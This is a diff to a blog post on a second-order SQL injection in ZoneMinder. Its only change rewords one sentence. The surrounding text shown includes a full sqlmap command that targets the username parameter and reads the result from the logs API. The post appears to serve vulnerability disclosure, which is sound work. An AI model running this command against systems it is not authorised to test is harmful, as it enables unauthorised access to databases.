Sjord/Sjord.github.io/_posts/2019-02-27-second-order-sql-injection-in-zoneminder.md

 ### Exploiting with sqlmap

-Sqlmap is an excellent tool to exploit SQL injection, and can be used to exploit this particular vulnerability.
+Sqlmap is an excellent tool to exploit SQL injection, and can exploit this particular vulnerability.
 This can be done with this command:

     ./sqlmap.py -r login.request.txt -p username --second-url='http://zoneminder.local/zm/api/index.php/logs.json?auth=a' --ignore-code=401 --dbms=mysql --level=3